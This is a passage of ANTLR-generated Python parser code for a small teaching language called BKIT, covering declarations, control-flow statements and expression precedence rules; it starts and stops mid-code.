self.match(BKITParser.RIGHT_BRACKET)\n self.state = 186 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n pass\n\n elif la_ == 2:\n self.state = 188\n self.match(BKITParser.ID)\n pass\n\n\n self.state = 191\n self.match(BKITParser.ASSIGN)\n self.state = 194\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.LEFT_BRACE]:\n self.state = 192\n self.array_lit()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 193\n self.primitive_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_init\n\n\n\n\n def composite_init(self):\n\n localctx = BKITParser.Composite_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_composite_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 196\n self.composite_var()\n self.state = 197\n self.match(BKITParser.ASSIGN)\n self.state = 198\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_initContext(ParserRuleContext):\n\n def __init__(self, parser, 
parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_init\n\n\n\n\n def primitive_init(self):\n\n localctx = BKITParser.Primitive_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_primitive_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 200\n self.match(BKITParser.ID)\n self.state = 201\n self.match(BKITParser.ASSIGN)\n self.state = 202\n self.primitive_data()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Params_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_params_list\n\n\n\n\n def params_list(self):\n\n localctx = BKITParser.Params_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_params_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 204\n self.var_non_init()\n self.state = 209\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 205\n self.match(BKITParser.COMMA)\n 
self.state = 206\n self.var_non_init()\n self.state = 211\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Stmt_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt_list\n\n\n\n\n def stmt_list(self):\n\n localctx = BKITParser.Stmt_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 26, self.RULE_stmt_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 217\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 212\n self.var_declare_stmt()\n self.state = 213\n self.match(BKITParser.SEMI)\n self.state = 219\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 223\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,20,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n self.state = 220\n self.stmt() \n self.state = 225\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,20,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n 
self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def if_stmt(self):\n return self.getTypedRuleContext(BKITParser.If_stmtContext,0)\n\n\n def for_stmt(self):\n return self.getTypedRuleContext(BKITParser.For_stmtContext,0)\n\n\n def while_stmt(self):\n return self.getTypedRuleContext(BKITParser.While_stmtContext,0)\n\n\n def dowhile_stmt(self):\n return self.getTypedRuleContext(BKITParser.Dowhile_stmtContext,0)\n\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def break_stmt(self):\n return self.getTypedRuleContext(BKITParser.Break_stmtContext,0)\n\n\n def continue_stmt(self):\n return self.getTypedRuleContext(BKITParser.Continue_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def return_stmt(self):\n return self.getTypedRuleContext(BKITParser.Return_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_stmt)\n try:\n self.state = 245\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,21,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 226\n self.if_stmt()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 227\n self.for_stmt()\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 228\n self.while_stmt()\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 229\n self.dowhile_stmt()\n pass\n\n elif la_ == 5:\n self.enterOuterAlt(localctx, 5)\n self.state 
= 230\n self.assign_stmt()\n self.state = 231\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 6:\n self.enterOuterAlt(localctx, 6)\n self.state = 233\n self.break_stmt()\n self.state = 234\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 7:\n self.enterOuterAlt(localctx, 7)\n self.state = 236\n self.continue_stmt()\n self.state = 237\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 8:\n self.enterOuterAlt(localctx, 8)\n self.state = 239\n self.call_stmt()\n self.state = 240\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 9:\n self.enterOuterAlt(localctx, 9)\n self.state = 242\n self.return_stmt()\n self.state = 243\n self.match(BKITParser.SEMI)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class If_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def IF(self):\n return self.getToken(BKITParser.IF, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def THEN(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.THEN)\n else:\n return self.getToken(BKITParser.THEN, i)\n\n def stmt_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Stmt_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,i)\n\n\n def ENDIF(self):\n return self.getToken(BKITParser.ENDIF, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def ELSEIF(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ELSEIF)\n else:\n return self.getToken(BKITParser.ELSEIF, i)\n\n def ELSE(self):\n return self.getToken(BKITParser.ELSE, 0)\n\n def getRuleIndex(self):\n 
return BKITParser.RULE_if_stmt\n\n\n\n\n def if_stmt(self):\n\n localctx = BKITParser.If_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_if_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 247\n self.match(BKITParser.IF)\n self.state = 248\n self.expr()\n self.state = 249\n self.match(BKITParser.THEN)\n self.state = 250\n self.stmt_list()\n self.state = 258\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ELSEIF:\n self.state = 251\n self.match(BKITParser.ELSEIF)\n self.state = 252\n self.expr()\n self.state = 253\n self.match(BKITParser.THEN)\n self.state = 254\n self.stmt_list()\n self.state = 260\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 263\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.ELSE:\n self.state = 261\n self.match(BKITParser.ELSE)\n self.state = 262\n self.stmt_list()\n\n\n self.state = 265\n self.match(BKITParser.ENDIF)\n self.state = 266\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declare_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self):\n return self.getTypedRuleContext(BKITParser.Var_declareContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare_stmt\n\n\n\n\n def var_declare_stmt(self):\n\n localctx = BKITParser.Var_declare_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 32, self.RULE_var_declare_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 268\n self.var_declare()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n 
self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class For_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FOR(self):\n return self.getToken(BKITParser.FOR, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDFOR(self):\n return self.getToken(BKITParser.ENDFOR, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_for_stmt\n\n\n\n\n def for_stmt(self):\n\n localctx = BKITParser.For_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 34, self.RULE_for_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 270\n self.match(BKITParser.FOR)\n self.state = 271\n self.match(BKITParser.LEFT_PAREN)\n self.state = 272\n self.match(BKITParser.ID)\n self.state = 273\n self.match(BKITParser.ASSIGN)\n self.state = 274\n self.expr()\n self.state = 275\n self.match(BKITParser.COMMA)\n self.state = 276\n self.expr()\n self.state = 277\n self.match(BKITParser.COMMA)\n self.state = 278\n self.expr()\n self.state = 279\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 280\n self.match(BKITParser.DO)\n self.state = 281\n 
self.stmt_list()\n self.state = 282\n self.match(BKITParser.ENDFOR)\n self.state = 283\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class While_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDWHILE(self):\n return self.getToken(BKITParser.ENDWHILE, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_while_stmt\n\n\n\n\n def while_stmt(self):\n\n localctx = BKITParser.While_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 36, self.RULE_while_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 285\n self.match(BKITParser.WHILE)\n self.state = 286\n self.expr()\n self.state = 287\n self.match(BKITParser.DO)\n self.state = 288\n self.stmt_list()\n self.state = 289\n self.match(BKITParser.ENDWHILE)\n self.state = 290\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Dowhile_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return 
self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def ENDDO(self):\n return self.getToken(BKITParser.ENDDO, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_dowhile_stmt\n\n\n\n\n def dowhile_stmt(self):\n\n localctx = BKITParser.Dowhile_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 38, self.RULE_dowhile_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 292\n self.match(BKITParser.DO)\n self.state = 293\n self.stmt_list()\n self.state = 294\n self.match(BKITParser.WHILE)\n self.state = 295\n self.expr()\n self.state = 296\n self.match(BKITParser.ENDDO)\n self.state = 297\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 40, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 301\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,24,self._ctx)\n if la_ == 1:\n self.state = 299\n 
self.composite_var()\n pass\n\n elif la_ == 2:\n self.state = 300\n self.match(BKITParser.ID)\n pass\n\n\n self.state = 303\n self.match(BKITParser.ASSIGN)\n\n self.state = 304\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Break_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def BREAK(self):\n return self.getToken(BKITParser.BREAK, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_break_stmt\n\n\n\n\n def break_stmt(self):\n\n localctx = BKITParser.Break_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 42, self.RULE_break_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 306\n self.match(BKITParser.BREAK)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Continue_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def CONTINUE(self):\n return self.getToken(BKITParser.CONTINUE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_continue_stmt\n\n\n\n\n def continue_stmt(self):\n\n localctx = BKITParser.Continue_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 44, self.RULE_continue_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 308\n self.match(BKITParser.CONTINUE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def 
__init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 46, self.RULE_call_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 310\n self.function_call()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Return_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_return_stmt\n\n\n\n\n def return_stmt(self):\n\n localctx = BKITParser.Return_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 48, self.RULE_return_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 312\n self.match(BKITParser.RETURN)\n self.state = 314\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.UN_LOGICAL_OP) | (1 << BKITParser.UN_OP) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 313\n self.expr()\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n 
finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr1Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr1Context,i)\n\n\n def REL_OP(self):\n return self.getToken(BKITParser.REL_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 50, self.RULE_expr)\n try:\n self.state = 321\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,26,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 316\n self.expr1(0)\n self.state = 317\n self.match(BKITParser.REL_OP)\n self.state = 318\n self.expr1(0)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 320\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def BIN_LOGICAL_OP(self):\n return self.getToken(BKITParser.BIN_LOGICAL_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 52\n 
self.enterRecursionRule(localctx, 52, self.RULE_expr1, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 324\n self.expr2(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 331\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,27,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 326\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 327\n self.match(BKITParser.BIN_LOGICAL_OP)\n self.state = 328\n self.expr2(0) \n self.state = 333\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,27,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def ADD_OP(self):\n return self.getToken(BKITParser.ADD_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 54\n self.enterRecursionRule(localctx, 54, self.RULE_expr2, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 
335\n self.expr3(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 342\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,28,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 337\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 338\n self.match(BKITParser.ADD_OP)\n self.state = 339\n self.expr3(0) \n self.state = 344\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,28,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr3Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def MUL_OP(self):\n return self.getToken(BKITParser.MUL_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr3\n\n\n\n def expr3(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr3Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 56\n self.enterRecursionRule(localctx, 56, self.RULE_expr3, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 346\n self.expr4()\n self._ctx.stop = self._input.LT(-1)\n self.state = 353\n self._errHandler.sync(self)\n _alt = 
self._interp.adaptivePredict(self._input,29,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr3Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr3)\n self.state = 348\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 349\n self.match(BKITParser.MUL_OP)\n self.state = 350\n self.expr4() \n self.state = 355\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,29,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr4Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def UN_LOGICAL_OP(self):\n return self.getToken(BKITParser.UN_LOGICAL_OP, 0)\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr4\n\n\n\n\n def expr4(self):\n\n localctx = BKITParser.Expr4Context(self, self._ctx, self.state)\n self.enterRule(localctx, 58, self.RULE_expr4)\n try:\n self.state = 359\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.UN_LOGICAL_OP]:\n self.enterOuterAlt(localctx, 1)\n self.state = 356\n self.match(BKITParser.UN_LOGICAL_OP)\n self.state = 357\n self.expr4()\n pass\n elif token in [BKITParser.ID, BKITParser.UN_OP, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, 
